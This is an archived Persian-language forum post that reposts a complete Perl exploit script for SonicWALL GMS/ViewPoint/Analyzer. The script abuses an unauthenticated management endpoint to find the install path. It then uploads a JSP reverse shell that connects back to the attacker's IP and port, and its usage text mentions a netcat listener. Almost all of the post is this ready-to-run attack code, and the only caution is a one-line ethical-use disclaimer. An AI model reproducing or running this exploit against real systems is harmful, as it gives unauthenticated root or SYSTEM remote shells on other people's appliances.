PDA

توجه ! این یک نسخه آرشیو شده میباشد و در این حالت شما عکسی را مشاهده نمیکنید برای مشاهده کامل متن و عکسها بر روی لینک مقابل کلیک کنید : SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x Remote Root/SYSTEM Exploit



حامد کیانمهر
21st January 2013, 16:43
SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x Remote Root/SYSTEM Exploit



#!/usr/bin/perl







##






# Title: SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x Remote Root/SYSTEM exploit





# Name: sgmsRCE.pl





# Author: Nikolas Sotiriu (lofi) <lofi[at]sotiriu.de>





#





# Use it only for education or ethical pentesting! The author accepts





# no liability for damage caused by this tool.





#





##

















use strict;





use HTTP::Request::Common qw(POST);





use LWP::UserAgent;





use LWP::Protocol::https;





use Getopt::Std;

















my %args;





getopt('hlp:', \%args);











my $victim = $args{h} || usage();





my $lip = $args{l};





my $lport = $args{p};





my $detect = $args{d};





my $shellname = "cbs.jsp";











banner();











my $gms_path;





my $target;





my $sysshell;











my $agent = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0,},);





$agent->agent("Mozilla/5.0 (X11; Linux x86_64; rv:11.0) Gecko/20100101 Firefox/11.0");











# Place your Proxy here if needed





#$agent->proxy(['http', 'https'], 'http://localhost:8080/');











print "[+] Checking host ...\n";





my $request = POST "$victim/appliance/applianceMainPage?skipSessionCheck=1",





Content_Type => 'application/x-www-form-urlencoded; charset=UTF-8',





Content => [ num => "123456",





action => "show_diagnostics",





task => "search",





item => "application_log",





criteria => "*.*",





width => "500",





];











my $result = $agent->request($request);











if ($result->is_success) {





print "[+] Host looks vulnerable ...\n";





} else {





print "[-] Error while connecting ... $result->status_line\n";





exit(0);





}

















my @lines=split("\n",$result->content);











foreach my $line (@lines) {





if ($line =~ /OPTION VALUE=/) {





my @a=split("\"", $line);





if ($a[1] =~ m/logs/i) {





my @b=split(/logs/i,$a[1]);





$gms_path=$b[0];





}





if ($gms_path ne "") {





print "[+] GMS Path: $gms_path\n";





last;





} else {





next;





}





}





}





if ($gms_path eq "") {





print "[-] Couldn't get the GMS path ... Maybe not vulnerable\n";





exit(0);





}

















if ($gms_path =~ m/^\//) {





$target="UNX";





$gms_path=$gms_path."Tomcat/webapps/appliance/";





$sysshell="/bin/sh";





print "[+] Target ist Unix...\n";





} else {





$target="WIN";





$gms_path=$gms_path."Tomcat\\webapps\\appliance\\";





$sysshell="cmd.exe";





print "[+] Target ist Windows...\n";





}











&_writing_shell;











if (!$detect) {





print "[+] Uploading shell ...\n";





my $request = POST "$victim/appliance/applianceMainPage?skipSessionCheck=1",





Content_Type => 'multipart/form-data',





Content => [ action => "file_system",





task => "uploadFile",





searchFolder => "$gms_path",





uploadFileName => ["$shellname"]





];











my $result = $agent->request($request);











if ($result->is_success) {





print "[+] Upload completed ...\n";





} else {





print "[-] Error while connecting ... $result->status_line\n";





exit(0);





}











unlink("$shellname");











print "[+] Spawning remote root/system shell ...\n";





my $result = $agent->get("$victim/appliance/$shellname");











if ($result->is_success) {





print "[+] Have fun ...\n";





} else {





print "[-] Error while connecting ... $result->status_line\n";





exit(0);





}





}











sub _writing_shell {





open FILE, ">", "$shellname" or die $!;





print FILE << "EOF";





<%\@page import="java.lang.*"%>





<%\@page import="java.util.*"%>





<%\@page import="java.io.*"%>





<%\@page import="java.net.*"%>





<%





class StreamConnector extends Thread





{





InputStream is;





OutputStream os;











StreamConnector( InputStream is, OutputStream os )





{





this.is = is;





this.os = os;





}





public void run()





{





BufferedReader in = null;





BufferedWriter out = null;





try





{





in = new BufferedReader( new InputStreamReader( this.is ) );





out = new BufferedWriter( new OutputStreamWriter( this.os ) );





char buffer[] = new char[8192];





int length;





while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )





{





out.write( buffer, 0, length );





out.flush();





}





} catch( Exception e ){}





try





{





if( in != null )





in.close();





if( out != null )





out.close();





} catch( Exception e ){}





}





}





try





{





Socket socket = new Socket( "$lip", $lport );





Process process = Runtime.getRuntime().exec( "$sysshell" );





( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();





( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();





} catch( Exception e ) {}





%>











EOF











close(FILE);





}











sub usage {





print "\n";





print " $0 - SonicWALL GMS/VIEWPOINT/Analyzer Remote Root/SYSTEM exploit\n";





print "================================================== ==================\n\n";





print " Usage:\n";





print " $0 -h <http://victim> -l <yourip> -p <yourport>\n";





print " Notes:\n";





print " Start your netcat listener <nc -lp 4444>\n";





print " -d only checks if the Host is vulnerable\n";





print "\n";





print " Author:\n";





print " Nikolas Sotiriu (lofi)\n";





print " url: www.sotiriu.de\n";





print " mail: lofi[at]sotiriu.de\n";





print "\n";

















exit(1);





}











sub banner {





print STDERR << "EOF";





--------------------------------------------------------------------------------





SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x Remote Root/SYSTEM exploit





--------------------------------------------------------------------------------











EOF



}